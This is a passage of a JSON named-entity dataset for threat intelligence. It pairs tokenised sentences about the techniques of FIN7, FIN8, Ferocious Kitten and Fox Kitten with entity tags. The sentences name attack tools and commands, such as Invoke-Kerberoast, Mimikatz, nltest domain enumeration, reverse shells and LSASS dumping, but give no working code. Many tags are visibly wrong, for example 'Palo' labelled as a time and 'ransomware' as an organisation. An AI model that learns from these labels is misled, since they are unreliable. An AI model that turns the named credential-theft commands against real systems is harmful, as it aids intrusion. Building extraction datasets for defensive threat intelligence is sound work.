"tokens": [ "FIN7", "has", "used", "Kerberoasting", "PowerShell", "commands", "such", "as,", "`Invoke-Kerberoast`", "for", "credential", "access", "and", "to", "enable", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "used", "compromised", "credentials", "for", "access", "as", "SYSTEM", "on", "Exchange", "servers." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FIN7", "lured", "victims", "to", "double-click", "on", "images", "in", "the", "attachments", "they", "sent", "which", "would", "then", "execute", "the", "hidden", "LNK", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "used", "malicious", "links", "to", "lure", "victims", "into", "downloading", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "developed", "malware", "for", "use", "in", "operations,", "including", "the", "creation", "of", "infected", "removable", "media." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "FIN7", "has", "created", "a", "scheduled", "task", "named", "“AdobeFlashSync”", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "attempted", "to", "run", "Darkside", "ransomware", "with", "the", "filename", "sleep.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "FIN7", "has", "used", "mshta.exe", "to", "execute", "VBScript", "to", "execute", "malicious", "code", "on", "victim", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "used", "port-protocol", "mismatches", "on", "ports", "such", "as", "53,", "80,", "443,", "and", "8080", "during", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "used", "a", "PowerShell", "script", "to", "launch", "shellcode", "that", "retrieved", "an", "additional", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "malware", "has", "created", "Registry", "Run", "and", "RunOnce", "keys", "to", "establish", "persistence,", "and", "has", "also", "added", "items", "to", "the", "Startup", "folder." ], "ner_tags": [ "B-Idus", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "FIN7", "has", "utilized", "the", "remote", "management", "tool", "Atera", "to", "download", "malware", "to", "a", "compromised", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "used", "RDP", "to", "move", "laterally", "in", "victim", "environments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "actors", "have", "mailed", "USB", "drives", "to", "potential", "victims", "containing", "malware", "that", "downloads", "and", "installs", "various", "backdoors,", "including", "in", "some", "cases", "for", "ransomware", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O" ] }, { "tokens": [ "FIN7", "has", "used", "`rundll32.exe`", "to", "execute", "malware", "on", "a", "compromised", "network." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "used", "SSH", "to", "move", "laterally", "through", "victim", "environments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "malware", "has", "created", "scheduled", "tasks", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "captured", "screenshots", "and", "desktop", "video", "recordings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "sent", "spearphishing", "emails", "with", "either", "malicious", "Microsoft", "Documents", "or", "RTF", "files", "attached." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Way", "O", "O", "O", "I-SamFile", "B-SecTeam", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "FIN7", "has", "conducted", "broad", "phishing", "campaigns", "using", "malicious", "links." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Org", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "used", "the", "command", "`cmd.exe", "/C", "quser`", "to", "collect", "user", "session", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "utilized", "a", "variety", "of", "tools", "such", "as", "Cobalt", "Strike,", "PowerSploit,", "and", "the", "remote", "management", "tool,", "Atera", "for", "targeting", "efforts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "staged", "legitimate", "software,", "that", "was", "trojanized", "to", "contain", "an", "Atera", "agent", "installer,", "on", "Amazon", "S3." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "used", "images", "embedded", "into", "document", "lures", "that", "only", "activate", "the", "payload", "when", "a", "user", "double", "clicks", "to", "avoid", "sandboxes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "used", "TightVNC", "to", "control", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "harvested", "valid", "administrative", "credentials", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "created", "a", "custom", "video", "recording", "capability", "that", "could", "be", "used", "to", "monitor", "operations", "in", "the", "victim's", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "used", "VBS", "scripts", "to", "help", "perform", "tasks", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "set", "up", "Amazon", "S3", "buckets", "to", "host", "trojanized", "digital", "products." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "used", "the", "command", "prompt", "to", "launch", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "used", "WMI", "to", "install", "malware", "on", "targeted", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "created", "new", "Windows", "services", "and", "added", "them", "to", "the", "startup", "directories", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "RAR", "to", "compress", "collected", "data", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "the", "Plink", "utility", "to", "tunnel", "RDP", "back", "to", "C2", "infrastructure." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Org", "I-Org", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "injected", "malicious", "code", "into", "a", "new", "svchost.exe", "process." ], "ner_tags": [ "B-Idus", "O", "I-Way", "O", "B-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "FIN8", "has", "cleared", "logs", "during", "post", "compromise", "cleanup", "activities." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "an", "expired", "open-source", "X.509", "certificate", "for", "testing", "in", "the", "OpenSSL", "repository,", "to", "connect", "to", "actor-controlled", "C2", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "environment", "variables", "and", "standard", "input", "(stdin)", "to", "obfuscate", "command-line", "arguments.", "FIN8", "also", "obfuscates", "malicious", "macros", "delivered", "as", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "deployed", "ransomware", "such", "as", "Ragnar", "Locker,", "White", "Rabbit,", "and", "attempted", "to", "execute", "Noberus", "on", "compromised", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "retrieved", "a", "list", "of", "trusted", "domains", "by", "using", "<code>nltest.exe", "/domain_trusts</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "FIN8", "has", "used", "FTP", "to", "exfiltrate", "collected", "data." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "FIN8", "has", "exploited", "the", "CVE-2016-0167", "local", "vulnerability." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "FIN8", "has", "deleted", "tmp", "and", "prefetch", "files", "during", "post", "compromise", "cleanup", "activities.", "FIN8", "has", "also", "deleted", "PowerShell", "scripts", "to", "evade", "detection", "on", "compromised", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "remote", "code", "execution", "to", "download", "subsequent", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "the", "Ping", "command", "to", "check", "connectivity", "to", "actor-controlled", "C2", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "harvests", "credentials", "using", "Invoke-Mimikatz", "or", "Windows", "Credentials", "Editor", "(WCE)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way" ] }, { "tokens": [ "FIN8", "has", "used", "malicious", "e-mail", "attachments", "to", "lure", "victims", "into", "executing", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "emails", "with", "malicious", "links", "to", "lure", "victims", "into", "installing", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "deleted", "Registry", "keys", "during", "post", "compromise", "cleanup", "activities." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "FIN8's", "malicious", "spearphishing", "payloads", "are", "executed", "as", "PowerShell.", "FIN8", "has", "also", "used", "PowerShell", "for", "lateral", "movement", "and", "credential", "access." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "B-Idus", "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "aggregates", "staged", "data", "from", "a", "network", "into", "a", "single", "location." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "RDP", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "dsquery", "and", "other", "Active", "Directory", "utilities", "to", "enumerate", "hosts;", "they", "have", "also", "used", "<code>nltest.exe", "/dclist</code>", "to", "retrieve", "a", "list", "of", "domain", "controllers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "attempted", "to", "map", "to", "C$", "on", "enumerated", "hosts", "to", "test", "the", "scope", "of", "their", "current", "credentials/context.", "FIN8", "has", "also", "used", "smbexec", "from", "the", "Impacket", "suite", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "scheduled", "tasks", "to", "maintain", "RDP", "backdoors." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "FIN8", "has", "used", "Registry", "keys", "to", "detect", "and", "avoid", "executing", "in", "potential", "sandboxes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "distributed", "targeted", "emails", "containing", "Word", "documents", "with", "embedded", "malicious", "macros." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "I-SamFile", "I-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "distributed", "targeted", "emails", "containing", "links", "to", "malicious", "documents", "with", "embedded", "macros." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "PowerShell", "Scripts", "to", "check", "the", "architecture", "of", "a", "compromised", "machine", "before", "the", "selection", "of", "a", "32-bit", "or", "64-bit", "version", "of", "a", "malicious", ".NET", "loader." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "FIN8", "has", "executed", "the", "command", "`quser`", "to", "display", "the", "session", "details", "of", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "a", "malicious", "framework", "designed", "to", "impersonate", "the", "lsass.exe/vmtoolsd.exe", "token." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Tool" ] }, { "tokens": [ "FIN8", "has", "used", "open-source", "tools", "such", "as", "Impacket", "for", "targeting", "efforts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "valid", "accounts", "for", "persistence", "and", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "HTTPS", "for", "command", "and", "control." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "<code>sslip.io</code>,", "a", "free", "IP", "to", "domain", "mapping", "service", "that", "also", "makes", "SSL", "certificate", "generation", "easier", "for", "traffic", "encryption,", "as", "part", "of", "their", "command", "and", "control." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "a", "Batch", "file", "to", "automate", "frequently", "executed", "post", "compromise", "cleanup", "activities.", "FIN8", "has", "also", "executed", "commands", "remotely", "via", "`cmd.exe`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "FIN8's", "malicious", "spearphishing", "payloads", "use", "WMI", "to", "launch", "malware", "and", "spawn", "`cmd.exe`", "execution.", "FIN8", "has", "also", "used", "WMIC", "and", "the", "Impacket", "suite", "for", "lateral", "movement,", "as", "well", "as", "during", "and", "post", "compromise", "cleanup", "activities." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN8", "has", "used", "WMI", "event", "subscriptions", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Ferocious", "Kitten", "has", "acquired", "domains", "imitating", "legitimate", "sites." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ferocious", "Kitten", "has", "attempted", "to", "convince", "victims", "to", "enable", "malicious", "content", "within", "a", "spearphishing", "email", "by", "including", "an", "odd", "decoy", "message." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ferocious", "Kitten", "has", "named", "malicious", "files", "<code>update.exe</code>", "and", "loaded", "them", "into", "the", "compromise", "host's", "“Public”", "folder." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ferocious", "Kitten", "has", "used", "right-to-left", "override", "to", "reverse", "executables’", "names", "to", "make", "them", "appear", "to", "have", "different", "file", "extensions,", "rather", "than", "their", "real", "ones." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ferocious", "Kitten", "has", "conducted", "spearphishing", "campaigns", "containing", "malicious", "documents", "to", "lure", "victims", "to", "open", "the", "attachments." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Org", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ferocious", "Kitten", "has", "obtained", "open", "source", "tools", "for", "its", "operations,", "including", "JsonCPP", "and", "Psiphon." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "sticky", "keys", "to", "launch", "a", "command", "prompt." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "7-Zip", "to", "archive", "data." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "Google", "Chrome", "bookmarks", "to", "identify", "internal", "resources", "and", "assets." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "brute", "forced", "RDP", "credentials." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "base64", "encoded", "scripts", "to", "avoid", "detection." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "a", "Perl", "reverse", "shell", "to", "communicate", "with", "C2." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "accessed", "files", "to", "gain", "valid", "credentials." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "obtained", "files", "from", "the", "victim's", "cloud", "storage", "instances." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "accessed", "victim", "security", "and", "IT", "environments", "and", "Microsoft", "Teams", "to", "mine", "valuable", "information." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "I-SecTeam", "I-SecTeam", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "searched", "local", "system", "resources", "to", "access", "sensitive", "documents." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "searched", "network", "shares", "to", "access", "sensitive", "documents." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "the", "Softerra", "LDAP", "browser", "to", "browse", "documentation", "on", "service", "accounts." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "base64", "encoded", "payloads", "to", "avoid", "detection." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "created", "KeyBase", "accounts", "to", "communicate", "with", "ransomware", "victims." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "exploited", "known", "vulnerabilities", "in", "Fortinet,", "PulseSecure,", "and", "Palo", "Alto", "VPN", "appliances." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Time", "B-SecTeam", "I-Tool", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "exploited", "known", "vulnerabilities", "in", "remote", "services", "including", "RDP." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "WizTree", "to", "obtain", "network", "files", "and", "directory", "listings." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "downloaded", "additional", "tools", "including", "PsExec", "directly", "to", "endpoints." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "prodump", "to", "dump", "credentials", "from", "LSASS." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "accessed", "ntuser.dat", "and", "UserClass.dat", "on", "compromised", "hosts." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-SamFile", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "created", "a", "local", "user", "account", "with", "administrator", "privileges." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-OffAct", "B-Purp", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "named", "the", "task", "for", "a", "reverse", "proxy", "lpupdate", "to", "appear", "legitimate." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "named", "binaries", "and", "configuration", "files", "svhost", "and", "dllhost", "respectively", "to", "appear", "legitimate." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "I-Tool", "I-Tool", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "Volume", "Shadow", "Copy", "to", "access", "credential", "information", "from", "NTDS." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "tools", "including", "NMAP", "to", "conduct", "broad", "scanning", "to", "identify", "open", "ports." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "scripts", "to", "access", "credential", "information", "from", "the", "KeePass", "database." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "PowerShell", "scripts", "to", "access", "credential", "data." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "protocol", "tunneling", "for", "communication", "and", "RDP", "activity", "on", "compromised", "hosts", "through", "the", "use", "of", "open", "source", "tools", "such", "as", "ngrok", "and", "custom", "tool", "SSHMinion." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "B-Way" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "the", "open", "source", "reverse", "proxy", "tools", "including", "FRPC", "and", "Go", "Proxy", "to", "establish", "connections", "from", "C2", "to", "local", "servers." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "accessed", "Registry", "hives", "ntuser.dat", "and", "UserClass.dat." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-SamFile", "O", "B-Way" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "RDP", "to", "log", "in", "and", "move", "laterally", "in", "the", "target", "environment." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "Angry", "IP", "Scanner", "to", "detect", "remote", "systems." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "valid", "accounts", "to", "access", "SMB", "shares." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "the", "PuTTY", "and", "Plink", "tools", "for", "lateral", "movement." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "Scheduled", "Tasks", "for", "persistence", "and", "to", "load", "and", "execute", "a", "reverse", "proxy", "binary." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Tool", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "a", "Twitter", "account", "to", "communicate", "with", "ransomware", "victims." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", 